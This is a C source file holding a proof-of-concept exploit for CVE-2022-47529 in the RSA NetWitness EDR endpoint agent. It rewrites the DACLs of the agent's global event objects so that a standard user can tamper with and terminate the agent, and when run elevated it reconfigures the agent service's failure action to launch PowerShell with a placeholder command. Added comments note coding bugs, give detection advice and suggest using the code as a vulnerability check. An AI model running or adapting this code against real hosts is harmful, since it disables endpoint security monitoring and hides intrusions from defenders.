RSA_NetWitness_Exploit.c
#include "windows.h"
#include "stdio.h"
#include "accctrl.h"
#include "aclapi.h"
#define OPEN_ALL_ACCESS 0x1F0003
/*
RSA NetWitness EDR Endpoint Agent
Tamper Protection Bypass / EoP Code Execution
RSA NetWitness.msi --> NWEAgent.exe
MD5: c0aa7e52cbf7799161bac9ebefa38d49
Expected result: Low privileged standard users are prevented from interfering with and or modifying events for the RSA Endpoint Agent.
Actual result: RSA NetWitness Endpoint Agent is terminated by a low privileged standard non-administrator user.
By John Page (hyp3rlinx) - Nov 2022
DISCLAIMER: The author of this code is not responsible or liable for any damages whatsoever from testing, modifying and or misuse.
Users of this supplied PoC code accept all risks, do no harm.
X64 PE file vuln code block:
00000001400F7B10 sub_1400F7B10 proc near ; CODE XREF: sub_14012F6F0+19B?p
.text:00000001400F7B10 ; sub_14013BA50+19?p
.text:00000001400F7B10 ; DATA XREF: ...
.text:00000001400F7B10 push rbx
.text:00000001400F7B12 sub rsp, 20h
.text:00000001400F7B16 mov rbx, rcx
.text:00000001400F7B19 test rcx, rcx
.text:00000001400F7B1C jz short loc_1400F7B5C
.text:00000001400F7B1E call cs:InitializeCriticalSection
.text:00000001400F7B24 lea rcx, [rbx+28h] ; lpCriticalSection
.text:00000001400F7B28 call cs:InitializeCriticalSection
.text:00000001400F7B2E mov edx, 1 ; bManualReset
.text:00000001400F7B33 xor r9d, r9d ; lpName
.text:00000001400F7B36 mov r8d, edx ; bInitialState
.text:00000001400F7B39 xor ecx, ecx ; lpEventAttributes
.text:00000001400F7B3B call cs:CreateEventW
.text:00000001400F7B41 mov [rbx+50h], rax
.text:00000001400F7B45 mov dword ptr [rbx+58h], 0
.text:00000001400F7B4C test rax, rax
.text:00000001400F7B4F jz short loc_1400F7B5C
1) Install "RSA NetWitness.msi" (Endpoint EDR Agent)
2) Run Exploit PoC as a Standard non-admin user, the PoC will:
a) Open a handle (copy) to Ecat002 event.
b) Open additional handles for events Ecat004 and Ecat002, modifying them to deny access to Everyone group.
c) Set/Reset the event through the Ecat002 handle.
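d) If the PoC is already running with admin privileges, change the EDR service configuration (the code runs this step only when its own token is elevated, so it is separate from the standard-user event tampering in a-c).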
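Non-vulnerable agents will output "Not vulnerable" to the console; customers can modify and use this test to check whether an agent is vulnerable. The message is printed only when one of the DACL calls fails, so a run that prints nothing of the kind is not by itself proof that an agent is fixed.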
*/
// Names of the two event objects that Exploit() opens and whose DACL it rewrites.
char Vuln_Events[][32] = {"Global\\Ecat004", "Global\\Ecat002"};
// Set to TRUE in Exploit() after a SetSecurityInfo call succeeds; Exploit() only frees its ACLs and closes the event handle once this is set.
BOOL PWNED=FALSE;
void Exploit();
// NOTE(review): this prototype is spelled AdminChl, but main() calls and the file defines AdminChk, so the call in main() has no matching declaration.
int AdminChl();
void HijackSvcConfig();
/*
 * Entry point of the PoC: prints the banner, runs Exploit(), and, when
 * AdminChk() returns nonzero, calls HijackSvcConfig().
 *
 * The "[+] Hijacked ..." line is printed before HijackSvcConfig() runs and no
 * return value is checked anywhere here, so the console output on its own is
 * not evidence that an agent was affected or that the service was changed.
 * Always returns 0.
 */
int main(void){
    static const char *const banner[] = {
        "[+] RSA NetWitness EDR Agent 0Day\n",
        "[+] CVE-2022-47529\n",
        "[+] Discovery: John Page (aka hyp3rlinx)\n",
        "[+] ===================================\n"
    };
    size_t line;

    for(line = 0; line < sizeof banner / sizeof banner[0]; ++line){
        fputs(banner[line], stdout);
    }

    /* Steps a-c of the header comment: runs for any user, elevated or not. */
    Exploit();

    /* Step d: only reached when the process token is already elevated. */
    if(AdminChk() != 0){
        fputs("[+] Hijacked NetWitness Agent Service!\n", stdout);
        HijackSvcConfig();
    }

    Sleep(2000);
    fputs("[+] Done!\n\n", stdout);
    /* Keeps the console window open until a key is pressed. */
    system("pause");
    return 0;
}
// Rewrites the DACL of each event named in Vuln_Events and then signals the events.
// For every event it reads the current DACL, merges in a deny-GENERIC_ALL entry for
// the "Everyone" group, writes the merged DACL back, and on success sets/resets the events.
//
// Defensive reading: every step depends on the caller being granted the full access mask
// it asks for (OPEN_ALL_ACCESS, 0x1F0003) on objects the header comment attributes to the agent,
// and on being allowed to replace their DACL. Events created with a security descriptor
// that withholds those rights from standard users make the open or the SetSecurityInfo call fail.
// Apply the vendor fix for CVE-2022-47529 and treat loss of agent telemetry from a host
// as an alert condition in its own right.
void Exploit(){
PACL pOldDACL = NULL;
PACL pNewDACL = NULL;
// Separate handle to Global\Ecat002 used for the set/reset below; the result is not checked.
HANDLE hEvent_Ecat002 = OpenEventA(OPEN_ALL_ACCESS,FALSE,(LPCSTR)"Global\\Ecat002");
int i=0;
for(; i < sizeof(Vuln_Events) / sizeof(Vuln_Events[0]); i++){
HANDLE hEvent = OpenEventA(OPEN_ALL_ACCESS,FALSE,(LPCSTR)Vuln_Events[i]);
// NOTE(review): OpenEventA reports failure by returning NULL, not INVALID_HANDLE_VALUE, so this
// test also passes when the event is absent or access is denied. In that case the
// "Targeting Event" line still prints and the run ends without a "Not vulnerable" message;
// anyone using this as a check should not read that output as a result either way.
if(hEvent != INVALID_HANDLE_VALUE){
printf("[-] Targeting Event: %s\n", Vuln_Events[i]);
Sleep(500);
// Read the event's current DACL into pOldDACL.
if(GetSecurityInfo(hEvent, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, &pOldDACL, NULL, NULL) == ERROR_SUCCESS){
// Trustee: the group named "Everyone".
TRUSTEE trustee[1];
trustee[0].TrusteeForm = TRUSTEE_IS_NAME;
trustee[0].TrusteeType = TRUSTEE_IS_GROUP;
trustee[0].ptstrName = TEXT("Everyone");
trustee[0].MultipleTrusteeOperation = NO_MULTIPLE_TRUSTEE;
trustee[0].pMultipleTrustee = NULL;
// One explicit entry: deny GENERIC_ALL to that trustee, not inherited.
EXPLICIT_ACCESS explicit_access_list[1];
ZeroMemory(&explicit_access_list[0], sizeof(EXPLICIT_ACCESS));
explicit_access_list[0].grfAccessMode = DENY_ACCESS;
explicit_access_list[0].grfAccessPermissions = GENERIC_ALL;
explicit_access_list[0].grfInheritance = NO_INHERITANCE;
explicit_access_list[0].Trustee = trustee[0];
// Merge the deny entry with the existing DACL into pNewDACL.
// NOTE(review): this merge happens in the caller's memory, so a failure here says nothing
// about the agent; execution also continues to SetSecurityInfo after the message is printed.
if(SetEntriesInAcl(1, explicit_access_list, pOldDACL, &pNewDACL) != ERROR_SUCCESS){
printf("%s%d", "[!] Not vulnerable! ", GetLastError());
}
// Write the merged DACL back to the event. Both ACL calls return their error code directly,
// so the GetLastError() value printed on failure may not be the actual failure reason.
if(SetSecurityInfo(hEvent, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDACL, NULL) != ERROR_SUCCESS){
printf("%s%d", "[!] Not vulnerable! ", GetLastError());
}else{
// DACL change accepted: set, reset and close the Ecat002 handle, then set the current event.
SetEvent(hEvent_Ecat002);
Sleep(1000);
ResetEvent(hEvent_Ecat002);
CloseHandle(hEvent_Ecat002);
SetEvent(hEvent);
Sleep(1000);
PWNED=TRUE;
}
// Cleanup runs only after a successful DACL change; otherwise the ACLs and hEvent stay open.
if(PWNED){
LocalFree(pNewDACL);
LocalFree(pOldDACL);
CloseHandle(hEvent);
}
Sleep(1000);
}
}
}
}
//If run as admin, the PoC modifies the agent service config to run its own code; AdminChk() below reports whether the process token is elevated.
/*
 * Reports whether the current process token is elevated.
 *
 * Opens the process token with TOKEN_QUERY and reads its TokenElevation
 * information. Returns the TokenIsElevated value on success and 0 when the
 * token cannot be opened or queried. The token handle is closed before
 * returning whenever one was obtained.
 */
int AdminChk(){
    HANDLE token = NULL;
    TOKEN_ELEVATION elevation;
    DWORD returned = sizeof(TOKEN_ELEVATION);
    int is_elevated = 0;

    /* Short-circuit: the query is attempted only if the token was opened. */
    if(OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &token)
       && GetTokenInformation(token, TokenElevation, &elevation, sizeof(elevation), &returned)){
        is_elevated = elevation.TokenIsElevated;
    }

    if(token != NULL){
        CloseHandle(token);
    }
    return is_elevated;
}
//Trivial example modify the service config...
// Waits one second, then launches the Windows `sc failure` command for the NWEAgent service
// through WinExec with show-state 0 (hidden window). The command text carries a placeholder
// instead of a real payload, and the WinExec return value is ignored.
// main() calls this only when AdminChk() reports an elevated token, so this step does not
// cross a privilege boundary by itself.
//
// Detection notes: a change to a security agent's service recovery settings is rare in normal
// operation. It shows up as an sc.exe process started with a "failure" argument and as a change
// to the FailureCommand / FailureActions values under the service's registry key; alert on both
// for EDR and other security-agent services.
void HijackSvcConfig(){
Sleep(1000);
WinExec("sc failure NWEAgent command= ""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" "Evil-Command-Here""", 0);
}